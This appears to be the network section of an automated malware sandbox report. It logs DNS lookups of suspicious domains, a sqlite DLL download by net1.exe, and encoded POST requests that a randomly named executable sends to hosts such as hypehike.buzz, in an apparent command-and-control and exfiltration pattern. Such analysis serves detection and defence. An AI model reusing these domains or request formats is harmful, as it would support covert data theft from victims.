                                                                            Mar 28, 2025 14:35:53.364384890 CET4918180192.168.2.22162.254.38.217
                                                                            Mar 28, 2025 14:35:54.523642063 CET4918180192.168.2.22162.254.38.217
                                                                            Mar 28, 2025 14:35:55.540429115 CET4918280192.168.2.22162.254.38.217
                                                                            Mar 28, 2025 14:35:55.706049919 CET8049182162.254.38.217192.168.2.22
                                                                            Mar 28, 2025 14:35:55.706156015 CET4918280192.168.2.22162.254.38.217
                                                                            Mar 28, 2025 14:35:55.715869904 CET4918280192.168.2.22162.254.38.217
                                                                            Mar 28, 2025 14:35:55.884809971 CET8049182162.254.38.217192.168.2.22
                                                                            Mar 28, 2025 14:35:55.898338079 CET8049182162.254.38.217192.168.2.22
                                                                            Mar 28, 2025 14:35:55.898391962 CET8049182162.254.38.217192.168.2.22
                                                                            Mar 28, 2025 14:35:55.898525953 CET4918280192.168.2.22162.254.38.217
                                                                            Mar 28, 2025 14:35:55.901458979 CET4918280192.168.2.22162.254.38.217
                                                                            Mar 28, 2025 14:35:56.067529917 CET8049182162.254.38.217192.168.2.22
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 28, 2025 14:34:28.809315920 CET5456253192.168.2.228.8.8.8
                                                                            Mar 28, 2025 14:34:28.917928934 CET53545628.8.8.8192.168.2.22
                                                                            Mar 28, 2025 14:34:34.305008888 CET5291753192.168.2.228.8.8.8
                                                                            Mar 28, 2025 14:34:34.434672117 CET53529178.8.8.8192.168.2.22
                                                                            Mar 28, 2025 14:34:44.191700935 CET6275153192.168.2.228.8.8.8
                                                                            Mar 28, 2025 14:34:44.285276890 CET53627518.8.8.8192.168.2.22
                                                                            Mar 28, 2025 14:34:57.432075024 CET5789353192.168.2.228.8.8.8
                                                                            Mar 28, 2025 14:34:57.534768105 CET53578938.8.8.8192.168.2.22
                                                                            Mar 28, 2025 14:35:11.181859016 CET5482153192.168.2.228.8.8.8
                                                                            Mar 28, 2025 14:35:11.317181110 CET53548218.8.8.8192.168.2.22
                                                                            Mar 28, 2025 14:35:33.566145897 CET5471953192.168.2.228.8.8.8
                                                                            Mar 28, 2025 14:35:33.709578991 CET53547198.8.8.8192.168.2.22
                                                                            Mar 28, 2025 14:35:47.180613995 CET4988153192.168.2.228.8.8.8
                                                                            Mar 28, 2025 14:35:47.304630995 CET53498818.8.8.8192.168.2.22
                                                                            Mar 28, 2025 14:36:00.909562111 CET5499853192.168.2.228.8.8.8
                                                                            Mar 28, 2025 14:36:01.191698074 CET53549988.8.8.8192.168.2.22

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Mar 28, 2025 14:34:28.809315920 CET192.168.2.228.8.8.80xcf3aStandard query (0)www.777assistant.xyzA (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:34.305008888 CET192.168.2.228.8.8.80x8e18Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:44.191700935 CET192.168.2.228.8.8.80x3e61Standard query (0)www.hypehike.buzzA (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:57.432075024 CET192.168.2.228.8.8.80xbbfcStandard query (0)www.viatotor.cfdA (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:11.181859016 CET192.168.2.228.8.8.80xd38fStandard query (0)www.ambitiouswomen.netA (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:33.566145897 CET192.168.2.228.8.8.80x2d9aStandard query (0)www.morpakampus.comA (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:47.180613995 CET192.168.2.228.8.8.80xe54fStandard query (0)www.streartex.liveA (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:36:00.909562111 CET192.168.2.228.8.8.80xb138Standard query (0)www.031232899.xyzA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Mar 28, 2025 14:34:28.917928934 CET8.8.8.8192.168.2.220xcf3aNo error (0)www.777assistant.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:28.917928934 CET8.8.8.8192.168.2.220xcf3aNo error (0)www.777assistant.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:34.434672117 CET8.8.8.8192.168.2.220x8e18No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:44.285276890 CET8.8.8.8192.168.2.220x3e61No error (0)www.hypehike.buzz94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:44.285276890 CET8.8.8.8192.168.2.220x3e61No error (0)94950.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:57.534768105 CET8.8.8.8192.168.2.220xbbfcNo error (0)www.viatotor.cfd104.21.94.162A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:34:57.534768105 CET8.8.8.8192.168.2.220xbbfcNo error (0)www.viatotor.cfd172.67.138.18A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:11.317181110 CET8.8.8.8192.168.2.220xd38fNo error (0)www.ambitiouswomen.net76.223.54.146A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:11.317181110 CET8.8.8.8192.168.2.220xd38fNo error (0)www.ambitiouswomen.net13.248.169.48A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:33.709578991 CET8.8.8.8192.168.2.220x2d9aNo error (0)www.morpakampus.com104.26.0.177A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:33.709578991 CET8.8.8.8192.168.2.220x2d9aNo error (0)www.morpakampus.com172.67.73.139A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:33.709578991 CET8.8.8.8192.168.2.220x2d9aNo error (0)www.morpakampus.com104.26.1.177A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:35:47.304630995 CET8.8.8.8192.168.2.220xe54fNo error (0)www.streartex.live162.254.38.217A (IP address)IN (0x0001)false
                                                                            Mar 28, 2025 14:36:01.191698074 CET8.8.8.8192.168.2.220xb138No error (0)www.031232899.xyz031232899.xyzCNAME (Canonical name)IN (0x0001)false
                                                                            Mar 28, 2025 14:36:01.191698074 CET8.8.8.8192.168.2.220xb138No error (0)031232899.xyz144.76.229.203A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.777assistant.xyz
                                                                            • www.sqlite.org
                                                                            • www.hypehike.buzz
                                                                            • www.viatotor.cfd
                                                                            • www.ambitiouswomen.net
                                                                            • www.morpakampus.com
                                                                            • www.streartex.live

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.224916176.223.54.146801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:34:29.043905973 CET559OUTGET /s1k7/?RtRt=H2TxDP-0yx&Up5Dxd=zKlqO7QNcfetDPpTJRNWr1IyWy9Pz553WMXns1xrbNYpuLFGGplxzK50t++Wm/Dpu5XCEj5cJoLsJvwgvv1H2BlHGmx6spHmojpwT52SXD2CVd9QciE69D6Wx6Ed HTTP/1.1
                                                                            Host: www.777assistant.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Mar 28, 2025 14:34:29.142996073 CET383INHTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Fri, 28 Mar 2025 13:34:29 GMT
                                                                            content-length: 262
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 74 52 74 3d 48 32 54 78 44 50 2d 30 79 78 26 55 70 35 44 78 64 3d 7a 4b 6c 71 4f 37 51 4e 63 66 65 74 44 50 70 54 4a 52 4e 57 72 31 49 79 57 79 39 50 7a 35 35 33 57 4d 58 6e 73 31 78 72 62 4e 59 70 75 4c 46 47 47 70 6c 78 7a 4b 35 30 74 2b 2b 57 6d 2f 44 70 75 35 58 43 45 6a 35 63 4a 6f 4c 73 4a 76 77 67 76 76 31 48 32 42 6c 48 47 6d 78 36 73 70 48 6d 6f 6a 70 77 54 35 32 53 58 44 32 43 56 64 39 51 63 69 45 36 39 44 36 57 78 36 45 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RtRt=H2TxDP-0yx&Up5Dxd=zKlqO7QNcfetDPpTJRNWr1IyWy9Pz553WMXns1xrbNYpuLFGGplxzK50t++Wm/Dpu5XCEj5cJoLsJvwgvv1H2BlHGmx6spHmojpwT52SXD2CVd9QciE69D6Wx6Ed"}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.224916245.33.6.223803596C:\Windows\SysWOW64\net1.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:34:34.854635954 CET289OUTGET /2021/sqlite-dll-win32-x86-3360000.zip HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Host: www.sqlite.org
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Mar 28, 2025 14:34:34.980621099 CET249INHTTP/1.1 200 OK
                                                                            Connection: keep-alive
                                                                            Date: Fri, 28 Mar 2025 13:34:34 GMT
                                                                            Last-Modified: Mon, 15 Nov 2021 22:45:13 GMT
                                                                            Cache-Control: max-age=120
                                                                            ETag: "m6192e2f9s87b79"
                                                                            Content-type: application/zip; charset=utf-8
                                                                            Content-length: 555897
                                                                            Mar 28, 2025 14:34:34.980628967 CET1031INData Raw: 50 4b 03 04 14 00 00 00 08 00 e0 0e d3 52 89 f2 7f 56 6c 06 00 00 06 1c 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 04 ec cc 60 04 ec cc 60 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cb d6 db 26 10 80 f7 7d 9b 24 3d
                                                                            Data Ascii: PKRVlsqlite3.defUT``ux&}$=9}vF21o;OA`1(]|#`Jz2udJ&<x34a.V#gM`a/Ly[WfFI:ou?dVlV6Po%389X^
                                                                            Mar 28, 2025 14:34:34.980638027 CET1031INData Raw: 93 7a 96 50 52 ba 22 35 d1 97 69 1b af e3 ce 35 77 25 8b 6d b3 69 14 15 04 fc 40 e4 76 39 96 16 62 14 b2 39 a7 84 62 e7 53 70 24 b5 9a f2 5b d2 9b a6 df 3e e5 a5 ef 45 96 b1 b1 5a e6 ad ab 47 86 1c 73 59 49 4b 18 71 bc 4c ab ca 31 53 8c 3e c6 76
                                                                            Data Ascii: zPR"5i5w%mi@v9b9bSp$[>EZGsYIKqL1S>v!9`,063el-U>dVdJYIXD2%iC0X5J=@O&%~=5=/ouwrO)N\MT.KRTx<mw[Jw
                                                                            Mar 28, 2025 14:34:34.980721951 CET1031INData Raw: 6b 30 6c af b3 b2 76 19 0c 29 5a 3e fc 63 d5 40 d8 cf 5a 8b 61 e9 2c f8 7d db 62 08 5a 30 9f c5 f0 fe 08 92 a8 ff 3a 2d 86 45 f3 fe e7 3e e0 03 16 43 d2 75 e2 2d bf 05 bc dc ff 9c ef 6e f1 d9 72 11 e1 8e 25 68 15 c2 b6 c6 8e 85 59 6d 28 58 7d f7
                                                                            Data Ascii: k0lv)Z>c@Za,}bZ0:-E>Cu-nr%hYm(X}3%bEo;v1pN4PhJx-p\n>}h,y\L4@\nvX6\N|/t[i16]~la,eo
                                                                            Mar 28, 2025 14:34:34.980731010 CET1031INData Raw: 02 5d 3d 79 cb 6f bb 4b 76 63 86 aa c0 62 71 32 56 66 3c c4 c3 ac 0e 4f f6 41 d2 92 25 a4 be aa 55 8c 07 78 cc 19 6e 85 c0 cf 6d 9d 25 ca 13 25 09 86 96 06 c0 5a dc b0 dd 64 ab 7a fb e9 ee 12 f8 20 5a 48 0e 98 33 6c 55 ef 43 68 43 1c d1 02 c5 0d
                                                                            Data Ascii: ]=yoKvcbq2Vf<OA%Uxnm%%Zdz ZH3lUChCP!n+bDlD%3Z"0|*S'B6-QX@*Eb;4=83$dF1,?n[Ybctp.[zj.BA=PzU*-'R|E
                                                                            Mar 28, 2025 14:34:34.980740070 CET1031INData Raw: 48 71 27 2e 13 9a df 39 ab 9d e4 07 e1 37 23 bf 8b e4 ef 5f 3f 4f d8 1b 4f bd dd 9c b7 93 e4 37 cb a1 74 79 20 be ec b6 35 07 12 c8 67 1f a3 a4 dd 77 96 1b 94 03 41 e2 0e 52 77 b3 dc 1a 26 9e 63 6f 9a dc c1 49 9e 63 ea 87 55 ad 1b a7 ca cd 61 d9
                                                                            Data Ascii: Hq'.97#_?OO7ty 5gwARw&coIcUapWS|8VCI4S#y)N>vfC.Zvtz=3`6Y<R7PM[_:7A=0ksLszIUV8{'
                                                                            Mar 28, 2025 14:34:34.980756998 CET1031INData Raw: b0 fe a3 89 5a ec fe 71 6a 49 41 4b a4 71 28 c1 9b a1 51 19 52 8f 77 ba 7f 33 67 4a aa b1 dc 93 9e f8 31 f6 5e 46 39 2f e4 0f e4 92 21 f5 2c f5 f4 70 05 16 52 64 2e 8a 4c 3e d8 87 fd ee 1e e0 5a 35 7e 09 8a 2a a0 ee 2b d0 29 20 7d 98 ad 20 ed c0
                                                                            Data Ascii: ZqjIAKq(QRw3gJ1^F9/!,pRd.L>Z5~*+) } /Sz{kpO,Jg-1oWRz]f!++?cJ_tqiwg}KKNOoMKV!pD\az~P;2<1{Q&emkAMPgZ##r:
                                                                            Mar 28, 2025 14:34:34.980763912 CET1031INData Raw: 62 8c 3f db aa fe 8b 2e b3 12 2b 40 b7 b1 b4 8c e5 a9 64 95 99 41 10 48 48 df 60 22 cb 53 a3 78 18 7f 7e 27 12 a4 7b 68 39 4f 93 88 74 8a ae e3 1d 7d 15 77 6d b1 66 14 9f 2a bb 0d 82 96 2d 31 10 5c 1f 03 93 91 d4 c1 46 09 eb 23 81 1c 25 07 58 73
                                                                            Data Ascii: b?.+@dAHH`"Sx~'{h9Ot}wmf*-1\F#%Xsb:f\$LJFE"gO.DiE$A}2R\5o.\R:Kw:L.iSPjNKS!67_MG+0a`,\WP9u\!
                                                                            Mar 28, 2025 14:34:34.980773926 CET1031INData Raw: 5b 9a 13 c6 8c 40 fe 36 64 7b 3e 8e d1 95 76 a4 b1 10 d6 16 39 8a ac 90 bd d5 5f ce f9 5d c3 2b fb fa ec ad c2 07 30 83 de 49 87 1d ac 6f 43 2a d4 da 5f c0 f9 b3 8c 72 9d c9 11 14 72 ea 1a 46 ba 08 3b d5 2c ec 74 5a 89 a7 9b 16 ce 21 ee 1e ba 29
                                                                            Data Ascii: [@6d{>v9_]+0IoC*_rrF;,tZ!),}}Nxr.:^[|[{'GXZlxRoa\6@&#3O\uJ<_;P;5tp0]c4.Y8|ed_M
                                                                            Mar 28, 2025 14:34:34.980781078 CET1031INData Raw: 53 a7 b5 c9 dd af 6d 74 57 d9 3a b1 a5 fa 3d fd 8a 49 41 c6 b4 9f 7a ae 46 6f 9d a9 a7 0d a7 6d a9 a7 8b db 94 55 c8 f6 b9 3b 89 a7 eb f3 17 3b 4f bb db 3e 0f 9d 6e db 34 5b ba 83 34 92 13 b0 13 6e 3b 81 15 93 c3 e1 75 31 f2 f0 b7 65 93 88 09 78
                                                                            Data Ascii: SmtW:=IAzFomU;;O>n4[4n;u1ex[:nhFgh4QVJI{Z&iK/tK|yMf=un?kjyW8cLiT(f%q|[4NB+]6
                                                                            Mar 28, 2025 14:34:35.106512070 CET1031INData Raw: 6d 1c d3 c0 02 c0 7c 69 52 86 5d 12 e8 26 48 fd 9c e7 00 27 26 b9 e4 3a 8b 5a bb 62 84 df 66 fa 5d 1b cd 63 4c 37 1e 5a 8e aa 73 cd 61 a7 75 54 97 1b ce 8b d8 3f e8 31 16 df dc ff 94 e2 71 05 2c 49 32 14 68 47 dd c2 be 82 14 54 c8 7d d1 eb 4c 5d
                                                                            Data Ascii: m|iR]&H'&:Zbf]cL7ZsauT?1q,I2hGT}L]-Ys7ZL+ywnKK+CBo]vG;a5&0G9wT5HuXqUYZAZwO`wn&s3Z}D39fE-OAGX5L0n5#


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.2249163199.59.243.228801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:34:44.392626047 CET2062OUTPOST /j7vq/ HTTP/1.1
                                                                            Host: www.hypehike.buzz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 2163
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.hypehike.buzz
                                                                            Referer: http://www.hypehike.buzz/j7vq/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 4d 65 4e 64 66 66 4d 4e 52 56 66 43 4e 53 73 62 75 68 49 7a 50 38 6d 56 70 33 73 33 51 2b 71 32 4d 43 49 57 71 72 79 6c 44 6c 6c 64 46 4f 38 4f 70 64 51 64 72 4c 4c 78 4f 41 64 6d 44 37 6c 69 4c 52 37 77 35 34 6d 58 61 74 30 55 6a 37 36 67 6d 57 45 4f 6a 58 35 6c 6c 5a 2b 6b 51 2f 35 73 59 4c 64 74 36 71 34 75 39 57 35 7a 56 76 2f 6a 2b 64 61 4f 4d 35 4c 49 77 34 74 6f 32 66 54 55 30 56 54 52 76 4c 43 43 32 39 72 31 59 34 70 47 72 58 51 57 49 4e 67 75 30 63 6b 4a 5a 76 35 65 63 47 59 53 4f 77 6e 37 73 52 6b 2f 63 79 61 46 37 33 6e 39 76 68 4f 59 6c 52 59 68 47 38 53 76 6f 37 58 6c 2f 73 78 62 34 6b 48 2b 79 78 31 41 4a 49 77 62 35 44 4c 6f 31 53 58 50 6a 6e 2b 6a 69 50 55 67 62 51 53 34 64 6f 62 5a 4d 36 67 38 44 56 4e 33 4a 37 4b 72 57 4d 74 34 44 71 2f 62 72 6a 66 54 48 64 68 36 69 6f 31 76 72 6a 76 45 45 69 54 64 6c 70 6b 39 6c 71 6d 6a 59 65 74 62 6f 69 5a 70 65 6e 42 43 6c 2b 34 49 43 65 52 53 55 33 6f 69 68 56 4b 68 47 6c 78 44 58 72 62 73 59 46 49 74 55 6a 66 70 6b 33 47 [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=MeNdffMNRVfCNSsbuhIzP8mVp3s3Q+q2MCIWqrylDlldFO8OpdQdrLLxOAdmD7liLR7w54mXat0Uj76gmWEOjX5llZ+kQ/5sYLdt6q4u9W5zVv/j+daOM5LIw4to2fTU0VTRvLCC29r1Y4pGrXQWINgu0ckJZv5ecGYSOwn7sRk/cyaF73n9vhOYlRYhG8Svo7Xl/sxb4kH+yx1AJIwb5DLo1SXPjn+jiPUgbQS4dobZM6g8DVN3J7KrWMt4Dq/brjfTHdh6io1vrjvEEiTdlpk9lqmjYetboiZpenBCl+4ICeRSU3oihVKhGlxDXrbsYFItUjfpk3GdmgBpKLvYVbrb6RYD0HgziZRlnRiGj6jalmL8mN3NOfcLcsKNfllBtONpzOQUacCxjgY3q4dJ0yaQeiFjVaZekjvL57W8XBTP3kpDU5sDQ5TnCjySd/bG5+pv+w9iOg7c3qeVtEqOwpxqSuQns+UpbtvkAPpbr1gp1CAXq5YwUHnBjztVnYvgSNlfgNL9jCsGOHPMOl76lx8aZFZYLPOK+vVp7ZlT81drWU6b+Es3HMQeBenZ6zTUf9Nr/YyKq07PYDj1gu6oUQ9g6zSnKnH9ClV60UEi/6IccOTy2JCvpIVBlB1cO1fW3NAtF3erZy0H9QuBsaZ0YIdBZdidztA1P1xjXtqXXKhT9cCOGOgsvGwGOkc8jtssHzJ/xEZ9dCs5bjHvo2Apw5FX9DhJX2weQZvsj7dW6DTbnOiosvDNk56rCXARzBAIKi7vkgp57GAudZFOzcfbvmmi5WyKx0UuDdY11VQ8VZ74rVkAVeEAaWEHYAaCFR4pVHM/GchOUSe1349EmImiEZtBokTikebabkSmV5t3G6OgIhSd0QJ1Mhv7Hkmf8o8yCQUbKxPDCMXNxlGJYzs8gGyaLZtNZQvhnxVnZGYGWWi8tWwQBQia1p+Dhf3sjkq9sQ6jfWobZrWSbih5+nFrLqU5TywRRwwbPROvDPNit40nm [TRUNCATED]
                                                                            Mar 28, 2025 14:34:44.481409073 CET718OUTData Raw: 4e 77 78 5a 34 4b 53 4e 44 30 75 6d 57 41 31 56 6e 2b 31 68 75 43 77 72 50 38 78 44 67 44 4d 38 43 36 73 2b 52 4e 4e 68 69 58 46 71 49 74 56 4f 70 4d 4c 36 72 57 41 64 76 39 56 33 55 79 78 6f 43 55 62 47 55 71 75 52 50 42 36 37 53 70 57 37 53 74
                                                                            Data Ascii: NwxZ4KSND0umWA1Vn+1huCwrP8xDgDM8C6s+RNNhiXFqItVOpML6rWAdv9V3UyxoCUbGUquRPB67SpW7St/yosPWvuO/2B1o5O3Abx1Dypi+USYiap3E7XAdPs/va8KNnWsm4mXFJCZy9M2aFczZ3Ytm//0uO8EnOwafjNZ7/P38q28NQaDdZAOOsI48IdlxO/vyjFO+lkKxTbvtJ90mE+ZK1oL4GsR0BCarSBNrbNZrlOPEFCz
                                                                            Mar 28, 2025 14:34:44.577105999 CET1031INHTTP/1.1 200 OK
                                                                            date: Fri, 28 Mar 2025 13:34:44 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1118
                                                                            x-request-id: 507057c5-7ed0-4245-aad4-562550a1314a
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bruqPiWh1rgjgWIXzgsDbAuCdrWosjTk9D2OexpzgzZd+kM+yzwBEtgfHYWP/EAHlWXcLsjJhRpEveYYnF0UQw==
                                                                            set-cookie: parking_session=507057c5-7ed0-4245-aad4-562550a1314a; expires=Fri, 28 Mar 2025 13:49:44 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 72 75 71 50 69 57 68 31 72 67 6a 67 57 49 58 7a 67 73 44 62 41 75 43 64 72 57 6f 73 6a 54 6b 39 44 32 4f 65 78 70 7a 67 7a 5a 64 2b 6b 4d 2b 79 7a 77 42 45 74 67 66 48 59 57 50 2f 45 41 48 6c 57 58 63 4c 73 6a 4a 68 52 70 45 76 65 59 59 6e 46 30 55 51 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bruqPiWh1rgjgWIXzgsDbAuCdrWosjTk9D2OexpzgzZd+kM+yzwBEtgfHYWP/EAHlWXcLsjJhRpEveYYnF0UQw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta
                                                                            Mar 28, 2025 14:34:44.577124119 CET776INData Raw: 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e
                                                                            Data Ascii: name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="htt


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.2249164199.59.243.228801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:34:47.038311005 CET819OUTPOST /j7vq/ HTTP/1.1
                                                                            Host: www.hypehike.buzz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 203
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.hypehike.buzz
                                                                            Referer: http://www.hypehike.buzz/j7vq/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 4d 65 4e 64 66 66 4d 4e 52 56 66 43 4e 54 73 62 68 51 49 7a 4f 63 6d 56 71 33 73 33 62 65 71 77 4d 43 55 65 71 71 32 31 44 32 56 64 46 66 73 4f 70 76 6f 64 6e 72 4c 79 47 67 64 71 4f 62 6b 67 4c 52 36 54 35 39 47 58 61 74 67 55 6c 5a 43 67 67 58 45 4e 38 33 35 6e 2b 4a 2b 70 51 2b 45 53 59 4c 5a 39 36 72 67 75 39 56 74 7a 55 75 50 6a 75 76 79 4f 65 35 4b 42 6b 49 73 67 32 66 66 42 30 57 37 5a 76 4c 2b 43 32 76 50 31 59 6f 4a 47 34 55 34 57 44 74 67 74 76 73 6c 77 4a 73 63 41 63 41 6f 50 41 47 37 62 6a 41 49 66 51 6c 6d 79 30 57 2b 32 73 6b 61 4e 72 6c 38 33 54 50 58 6d 33 77 3d 3d
                                                                            Data Ascii: Up5Dxd=MeNdffMNRVfCNTsbhQIzOcmVq3s3beqwMCUeqq21D2VdFfsOpvodnrLyGgdqObkgLR6T59GXatgUlZCggXEN835n+J+pQ+ESYLZ96rgu9VtzUuPjuvyOe5KBkIsg2ffB0W7ZvL+C2vP1YoJG4U4WDtgtvslwJscAcAoPAG7bjAIfQlmy0W+2skaNrl83TPXm3w==
                                                                            Mar 28, 2025 14:34:47.134936094 CET536INHTTP/1.1 200 OK
                                                                            date: Fri, 28 Mar 2025 13:34:46 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1118
                                                                            x-request-id: 7f2abe2f-0491-47f4-8a8d-983495708958
